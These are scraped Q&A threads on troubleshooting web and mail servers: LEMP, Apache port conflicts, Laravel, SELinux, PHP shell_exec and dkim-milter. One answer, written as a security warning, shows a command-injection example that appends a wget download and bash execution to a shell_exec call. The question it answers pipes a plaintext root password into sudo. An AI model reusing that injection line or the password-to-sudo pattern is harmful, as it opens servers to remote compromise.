Following this tutorial for setting up a LEMP stack on Ubuntu 16.04, I am unable to load the default page in the browser:
https://www.digitalocean.com/community/tutorials/how-to-install-linux-nginx-mysql-php-lemp-stack-in-ubuntu-16-04
I am trying to pull up the page by requesting the server IP address in the browser, i.e. typing http://server_ip_address into Chrome.
The connection times out. However, I am able to run
$ curl server_ip_address
and return the html in the terminal.
What am I doing wrong here?
Update: Resolved. Ended up being an issue with Cloudflare; had non-Cloudflare IP addresses blocked. So, there was no Nginx issue.
Check if you have the service running on the server by using: netstat -lt command
If the service is running then check if you have the security group rules against it
If both the above conditions are good then try accessing the start page on the port on which the service is running
Note:
Make sure nginx is running on port 80
Make sure you stopped apache2
(1)Run "curl" test at another host, not in the ${server_ip_address} itself.
(2)If you get the right result at step 1, then you will get the same result at chrome.
(3)Check the firewall of ${server_ip_address} host,such as:
netstat -ntpl | grep ${port_of_nginx}
iptables -L -n | grep ${port_of_nginx}
Related
First I tried to start apache but got unexpected error because default port 80 is being used by another program then I tried to terminate that program with in windows command line I typed resmon.exe to find out which program is using the port 80. I found out it is PID 4 then I tried to terminate with command taskkill/ PID 4 but got this
"ERROR: The process with PID 4 could not be terminated.
Reason: Access
is denied.
Secondly, I tried to change ports after and get apache running but got another problem
HTTP Error 404. The requested resource is not found.
It is meaning local host could not be found. I got stuck now any ideas?
It might be skype or windows IIS server running on your port 80
try this
Run cmd as Administrator
use C:\>Taskkill /PID 'pid of your process' /F to kill the task
I am running on Laravel 5.3.
Whenever I try to php artisan serve and type localhost:8000, It returns phpinfo. Now additional confusion has it when I cancel the serve then refresh it still shows the phpinfo
Is there any solution to this as to what have I messed up(I am using mac air)
Any help would be great!
Try another command to change the port of the localhost :
php -S localhost:1988 -t public
First check your :8000 port may be its busy .
netstat -anp tcp | grep 8000
You can kill it or try to load it using another port .
php artisan serve --port=8080
Faced a similar problem. Any use of php artisan returned phpinfo(). The reason was the incorrect code dd(phpinfo()) in my routes/web.php:
Route::any('/any', dd(phpinfo()));
I've installed a LAMP stack over CentOS 7.
If I try to resolve a name via php from command line it works, but if I execute that script thru web server it doesn't resolve the name. If I use ip directly it works, in each case.
For example:
$ip = gethostbyname('www.google.com');
echo "GOOGLE IP = " . $ip; // it shows IP only via php-cli, not thru apache
Any idea?
EDIT: disabling SE enforcing it works. It would be useful to know how configure it to work with SE enforcement enabled.
Set SELinux to permissive
setenforce 0
Make sure selinux-policy, selinux-policy-devel, setroubleshoot-server, setroubleshoot are installed
yum install selinux-policy, selinux-policy-devel, setroubleshoot-server, setroubleshoot -y
then tail the messages file and grep for sealert
tailf /var/log/messages | grep sealert
Your SELinux problem will get spit out in the form of
hostname setroubleshoot: SELinux is preventing httpd (httpd_t) "getattr" to /var/www/html/file1 (samba_share_t). For complete SELinux messages. run sealert -l 84e0b04d-d0ad-4347-8317-22e74f6cd020
so you then just run sealert -l 84e0b04d-d0ad-4347-8317-22e74f6cd020 to view your SELinux issue
Once you think you have fixed the issue, re enable SELinux setenforce 1 and check to see if your problem is fixed. If not then repeat the steps.
More info on sealert can be found at Red Hat's website, just don't disable SELinux.
I am trying to route add ip (Thats for null routing an ip, means that, preventing ip to send packets to my server. It needs to connect to the server, and run the command), in other words, ban an ip.
SSH command
route add 50.50.50.50 gw 127.0.0.1 lo
But I want to use it in php, using shell_exec() function. Tried this without any luck.
Php
shell_exec("echo 'rootpass' | sudo -u root -S route add 50.50.50.50 gw 127.0.0.1 lo");
It doesnt give me errors, nothing. What is the correct way to run that command in shell_exec() ?
try:
$output = shell_exec("echo 'rootpass' | sudo -u root -S route add 50.50.50.50 gw 127.0.0.1 lo");
echo "<pre>$output</pre>";
So depending on what HTTP server you are using (nginx, apache, etc) if properly configured these service accounts should not be able to execute that command because they do not have root level privileges in order to execute the changes you are wanting to make even if shell_exec is enabled.
You can test this by logging in as root, and if running apache, run the following commands:
su - apache (or whatever user apache is running as)
This should return.
This account is currently not available.
Since the apache user should be configured with nologin this, in theory, shouldnt work. However you can add a user to test this behavior with via 'useradd'.
That being said.. on my virtual machine I recreated this for context. I created a test user and attempted to run the command you listed. Here is the output (which is also what the apache user should get)
[timgalyean#test ~]$ route add 50.50.50.50 gw 127.0.0.1 lo
SIOCADDRT: Operation not permitted
[timgalyean#test ~]$
So as you can see the user does not have permission to do this. Contrary to the task at hand this is a good thing.
Also, I would personally advise against going this route as shell_exec can lead to other security problems.. specially if you give your user permissions to execute this.
Another thing I noticed is that you have sudo in your command. The service user should not have sudo access either. If I was able to figure out what your php script was doing I could craft something nifty such as..
shell_exec("echo 'rootpass' | sudo -u root -S route add 50.50.50.50 gw 127.0.0.1 lo ; wget url/myfile.txt; bash -c 'myfile.txt'");
Assuming myfile.txt was a shell I could then compromise your server via your service user which in order to get this working would require sudo access.
I have a problem with dkim-milter.
My maillog file is filled with logs
Dec 5 23:59:59 NS1 dkim-filter[31424]: Sendmail DKIM Filter: Unable to bind to port inet:20209#localhost: Address already in use
Dec 5 23:59:59 NS1 dkim-filter[31424]: Sendmail DKIM Filter: Unable to create listening socket on conn inet:20209#localhost
Dec 5 23:59:59 NS1 dkim-filter[31424]: smfi_opensocket() failed
I suspect that the problem is related to Dkim-filter.conf and line:
Socket inet:20209#localhost
It looks like something is allready runing on that port so I can't bind it again.
How can I change this and make DKIM running without errors?
As a note, I found that when I manually stopped and restarted the dkim-milter service, my logs filled up with that message. This was due to the config option "AutoRestart" which defaults to Yes"
With that option on, when the service is stopped using "service dkim-milter stop", it automatically restarts, and when my shell script then ran "service dkim-milter start" a few seconds later, it was duplicating the process and was unable to connect to the port as it was already running.
I am not really experienced enough to know the best was to fix it, but the problem above was tested and repeatable.
In my case, I was running the wrong command. Instead of running
sudo opendkim -x /etc/opendkim.conf -p inet:8891#localhost
I was running:
sudo opendkim -x /etc/opendkim.conf -p init:8891#localhost
Not sure how common this is, but it sure took me a while to track down.
port 20209 is already in use, maybe an old zombie dkim-milter?
netstat -nlp | grep 20209 will help you find out whats blocking the port
I had the same problem so with the help of a friend I followed the steps below:
Show 25 more recent errors from logs (/path/to/file): tail -n 25 /var/log/maillog
Listen to specific port (20209) to see what's blocking it: netstat -nlp | grep 20209
Check status of a service (dkim-milter in this case): service dkim-milter status
Show all proccesses with "filter" in name, because dkim-milter is
running as dkim-filter: ps ax | grep filter
Kill process with pid f.e. 32731: kill 32731
Now the process which produced the errors isn't running.
This is how to restart to dkim-milter and postfix:
service dkim-milter stop
service dkim-milter start
service postfix restart
And everything seemed to work ok now